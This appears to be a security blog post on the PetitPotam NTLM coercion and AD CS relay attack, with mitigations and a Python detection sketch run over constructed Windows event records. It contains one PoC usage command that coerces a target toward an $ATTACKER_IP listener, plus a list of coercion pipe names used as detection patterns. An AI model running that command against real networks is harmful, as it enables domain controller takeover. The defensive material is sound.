Within a month of PrintNightmare and HiveNightmare, Windows administrators have another one to deal with: PetitPotam.
PetitPotam is not a variant of PrintNightmare but a new NTLM coercion technique from Gilles Lionel (topotam). It calls a function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) over the network to force the target host, a domain controller included, to authenticate to a machine the attacker controls. That coerced NTLM authentication is then relayed, the most damaging relay target being Active Directory Certificate Services (AD CS) web enrollment, which is what Microsoft's ADV210003 advisory addresses.
The MS-EFSRPC interface is exposed by default on Windows hosts and is reachable through several named pipes (the PoC offers lsarpc, efsrpc, samr, netlogon and lsass), so disabling the EFS service alone does not stop the coercion; the mitigations that work are the ones in ADV210003, above all Extended Protection for Authentication on the AD CS endpoints and turning off NTLM where it is not needed.
By relaying the domain controller's authentication to a vulnerable AD CS endpoint, an attacker obtains a certificate for the DC's machine account, which is enough to take over the domain controller and with it the entire Windows domain.
Basic usage of the PoC, where the two positional arguments are the listener (the host running the NTLM relay) and the target to coerce:
python3 PetitPotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
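The attack has two observable ends: the coercion, which shows up on the targeted DC as an IPC$ access to one of the pipes above (Security event 5145), and the relay, which shows up on the relay target as an NTLM network logon of the DC's machine account coming from the attacker's IP (Security event 4624). The following is an added detection sketch, not code from the PetitPotam project or from the original page; it runs over constructed event records whose field names follow the Windows event schema but whose values (hosts, IPs, users) are made up for the example.

```python
# Added example (not from the PetitPotam project or the original page): a
# detection sketch for the two ends of a PetitPotam attack, run over
# constructed Windows Security event records. Field names follow the schema
# of events 5145 and 4624; every value below is made up.
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Named pipes through which the PetitPotam PoC reaches the EFSRPC interface
# (its -pipe option). Write access to these over IPC$ by an ordinary user is
# the coercion side of the attack.
COERCION_PIPES = {"efsrpc", "lsarpc", "samr", "netlogon", "lsass"}


@dataclass
class Event:
    event_id: int
    fields: Dict[str, str] = field(default_factory=dict)


def is_coercion_pipe_access(ev: Event) -> bool:
    """Event 5145: share access check against IPC$ naming a coercion pipe."""
    if ev.event_id != 5145:
        return False
    if not ev.fields.get("ShareName", "").lower().endswith("ipc$"):
        return False
    pipe = ev.fields.get("RelativeTargetName", "").lower().strip("\\")
    # Bit 0x2 (WriteData) in AccessMask: binding RPC to the pipe needs write.
    access = int(ev.fields.get("AccessMask", "0x0"), 16)
    return pipe in COERCION_PIPES and bool(access & 0x2)


def is_relayed_machine_logon(ev: Event, known_hosts: Dict[str, str]) -> bool:
    """Event 4624: NTLM network logon for a machine account from the wrong IP.

    The relay forwards the DC's NTLM messages unchanged, so the relay target
    sees DC01$ (workstation name DC01) logging on from the attacker's address
    instead of from DC01's own address.
    """
    if ev.event_id != 4624:
        return False
    f = ev.fields
    if f.get("LogonType") != "3" or f.get("AuthenticationPackageName") != "NTLM":
        return False
    account = f.get("TargetUserName", "")
    if not account.endswith("$"):
        return False
    expected_ip = known_hosts.get(account.upper())
    return expected_ip is not None and f.get("IpAddress") != expected_ip


def find_suspicious(events: List[Event],
                    known_hosts: Dict[str, str]) -> List[Tuple[str, str, str, str]]:
    """Return (indicator, account, source_ip, detail) for each matching event."""
    hits = []
    for ev in events:
        f = ev.fields
        if is_coercion_pipe_access(ev):
            hits.append(("coercion_pipe", f.get("SubjectUserName", ""),
                         f.get("IpAddress", ""), f.get("RelativeTargetName", "")))
        elif is_relayed_machine_logon(ev, known_hosts):
            hits.append(("relayed_machine_logon", f.get("TargetUserName", ""),
                         f.get("IpAddress", ""), f.get("WorkstationName", "")))
    return hits


# Constructed sample records: an attacker at 10.0.0.50 coerces DC01 (10.0.0.5)
# and relays the result to a server that then logs DC01$ arriving from 10.0.0.50.
KNOWN_HOSTS = {"DC01$": "10.0.0.5"}
SAMPLE_EVENTS = [
    Event(5145, {"SubjectUserName": "lowpriv", "IpAddress": "10.0.0.50",
                 "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "lsarpc",
                 "AccessMask": "0x12019f"}),
    Event(5145, {"SubjectUserName": "lowpriv", "IpAddress": "10.0.0.50",
                 "ShareName": "\\\\*\\SYSVOL", "RelativeTargetName": "Policies",
                 "AccessMask": "0x100081"}),
    Event(5145, {"SubjectUserName": "alice", "IpAddress": "10.0.0.21",
                 "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc",
                 "AccessMask": "0x12019f"}),
    Event(4624, {"TargetUserName": "DC01$", "LogonType": "3",
                 "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.50",
                 "WorkstationName": "DC01"}),
    Event(4624, {"TargetUserName": "DC01$", "LogonType": "3",
                 "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.5",
                 "WorkstationName": "DC01"}),
    Event(4624, {"TargetUserName": "alice", "LogonType": "3",
                 "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.21",
                 "WorkstationName": "WS21"}),
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS, KNOWN_HOSTS):
        print(hit)
```

The pipe check fires on the DC being coerced; the machine-account check fires on whatever the attacker relays to (the AD CS web enrollment server in the ADV210003 scenario), so both logs need to be collected. Legitimate admin tooling also opens lsarpc and samr, so in production the first indicator is a lead to correlate with the second rather than an alert on its own.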
Links:
- https://github.com/topotam/PetitPotam
- https://therecord.media/new-petitpotam-attack-forces-windows-hosts-to-share-their-password-hashes/
- https://msrc.microsoft.com/update-guide/vulnerability/ADV210003
- https://video.twimg.com/tweet_video/E7AW7-aXEAEmy2X.mp4
- https://www.bleepingcomputer.com/news/microsoft/new-petitpotam-attack-allows-take-over-of-windows-domains/
- https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-new-petitpotam-ntlm-relay-attack/
- https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-efsr
- https://www.dataprise.com/resources/blog/windows-server-petitpotam-defense-digest
- https://securityaffairs.co/wordpress/120489/hacking/windows-petitpotam-attack.html